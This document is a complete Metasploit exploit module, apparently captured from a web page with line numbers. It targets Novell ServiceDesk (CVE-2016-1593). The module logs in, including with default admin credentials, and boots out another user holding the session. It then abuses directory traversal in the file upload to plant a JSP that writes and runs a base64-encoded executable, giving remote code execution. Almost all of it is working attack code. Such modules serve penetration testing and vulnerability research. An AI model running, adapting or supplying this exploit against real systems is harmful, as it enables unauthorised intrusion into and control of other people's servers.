1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 |
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ServiceDesk Authenticated File Upload', 'Description'=> %q{ This module exploits an authenticated arbitrary file upload via directory traversal to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in Windows and Linux installations of Novell ServiceDesk, as well as the Virtual Appliance provided by Novell. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>'# Vulnerability discovery and Metasploit module ], 'License'=> MSF_LICENSE, 'References' => [ [ 'CVE', '2016-1593' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ], [ 'URL', 'http://seclists.org/bugtraq/2016/Apr/64' ] ], 'Platform'=> %w{ linux win }, 'Arch' => ARCH_X86, 'DefaultOptions' => { 'WfsDelay' => 15 }, 'Targets'=> [ [ 'Automatic', {} ], [ 'Novell ServiceDesk / Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ], [ 'Novell ServiceDesk / Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], ], 'Privileged' => false,# Privileged on Windows but not on (most) Linux targets 'DefaultTarget'=> 0, 'DisclosureDate' => 'Mar 30 2016' )) register_options( [ OptPort.new('RPORT', [true, 'The target port', 80]), OptString.new('USERNAME', [true, 'The username to login as', 'admin']), OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']), OptString.new('TRAVERSAL_PATH', [false, 'Traversal path to tomcat/webapps/LiveTime/']) ], self.class) end def get_version res = send_request_cgi({ 'uri'=> normalize_uri('LiveTime','WebObjects','LiveTime.woa'), 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', } }) if res && res.code == 200 && res.body.to_s =~ /\<p class\=\"login-version-title\"\>\Version \#([0-9\.]+)\<\/p\>/ return $1.to_f else return 999 end end def check version = get_version if version <= 7.1 && version >= 6.5 return Exploit::CheckCode::Appears elsif version > 7.1 return Exploit::CheckCode::Safe else return Exploit::CheckCode::Unknown end end def pick_target return target if target.name != 'Automatic' print_status("#{peer} - Determining target") os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>} traversal_paths = [] if datastore['TRAVERSAL_PATH'] traversal_paths << datastore['TRAVERSAL_PATH']# add user specified or default Virtual Appliance path end # add Virtual Appliance path plus the traversal in a Windows or Linux self install traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/']) # test each path to determine OS (and correct path) traversal_paths.each do |traversal_path| jsp_name = upload_jsp(traversal_path, os_finder_payload) res = send_request_cgi({ 'uri'=> normalize_uri('LiveTime', jsp_name), 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies }) if res && res.code == 200 if res.body.to_s =~ /Windows/ @my_target = targets[2] else # Linux here @my_target = targets[1] end if traversal_path.include? '/srv/tomcat6/webapps/' register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name) else register_files_for_cleanup('../webapps/LiveTime/' + jsp_name) end return traversal_path end end return nil end def upload_jsp(traversal_path, jsp) jsp_name= Rex::Text.rand_text_alpha(6+rand(8)) + ".jsp" post_data = Rex::MIME::Message.new post_data.add_part(jsp, "application/octet-stream", 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"") data = post_data.to_s res = send_request_cgi({ 'method' => 'POST', 'uri'=> normalize_uri(@upload_url), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies, 'data' => data, 'ctype'=> "multipart/form-data; boundary=#{post_data.bound}" }) if not res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...") else return jsp_name end end def create_jsp opts = {:arch => @my_target.arch, :platform => @my_target.platform} payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch) exe = generate_payload_exe(opts) base64_exe = Rex::Text.encode_base64(exe) native_payload_name = rand_text_alpha(rand(6)+3) ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin' var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3) var_path= Rex::Text.rand_text_alpha(rand(8) + 3) var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3) if @my_target['Platform'] == 'linux' var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); Thread.sleep(200); | var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) cleanup = %Q| Thread.sleep(200); Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path}); | else chmod = '' cleanup = '' end jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); #{cleanup} } catch (Exception e) { } %> | jsp = jsp.gsub(/\n/, '') jsp = jsp.gsub(/\t/, '') jsp = jsp.gsub(/\x0d\x0a/, "") jsp = jsp.gsub(/\x0a/, "") return jsp end def exploit version = get_version # 1: get the cookies, the login_url and the password_form and username form names (they varies between versions) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', } }) if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ login_url = $2 @cookies = res.get_cookies if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/ password_form = $1 else # we shouldn't hit this condition at all, this is default for v7+ password_form = 'password' end if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/ username_form = $1 else # we shouldn't hit this condition at all, this is default for v7+ username_form = 'username' end else fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.") end # 2: authenticate and get the import_url res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(login_url), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies, 'vars_post' => { username_form => datastore['USERNAME'], password_form => datastore['PASSWORD'], 'ButtonLogin' => 'Login' } }) if res && res.code == 200 && (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/) # v6.5 import_url = $1 else # hmm either the password is wrong or someone else is using "our" account.. . # let's try to boot him out if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ && res.body.to_s =~ /This account is in use on another system/ res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(login_url), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies, 'vars_post' => { username_form => datastore['USERNAME'], password_form => datastore['PASSWORD'], 'ButtonLoginOverride' => 'Login' } }) if res && res.code == 200 && (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/) # v6.5 import_url = $1 else fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.") end else fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.") end end # 3: get the upload_url res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(import_url), 'headers' => { 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', }, 'cookie' => @cookies, 'vars_post' => { 'ButtonImport' => 'Import' } }) if res && res.code == 200 && (res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above res.body.to_s =~ /\<form method\=\"post\" enctype\=\"multipart\/form-data\" action\=\"([\w\/\.]+)\"\>/) # v6.5 @upload_url = $1 else fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.") end if res.body.to_s =~ /\<input type\=\"file\" name\=\"([0-9\.]+)\" \/\>/ @upload_form = $1 else # go with the default for 7.1.0, might not work with other versions... @upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23" end # 4: target selection @my_target = nil # pick_target returns the traversal_path and sets @my_target traversal_path = pick_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") else print_status("#{peer} - Selected target #{@my_target.name} with traversal path #{traversal_path}") end # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") end # 5: generate the JSP with the payload jsp = create_jsp print_status("#{peer} - Uploading payload...") jsp_name = upload_jsp(traversal_path, jsp) if traversal_path.include? '/srv/tomcat6/webapps/' register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name) else register_files_for_cleanup('../webapps/LiveTime/' + jsp_name) end # 6: pwn it! print_status("#{peer} - Requesting #{jsp_name}") send_request_raw({'uri' => normalize_uri('LiveTime', jsp_name)}) handler end end |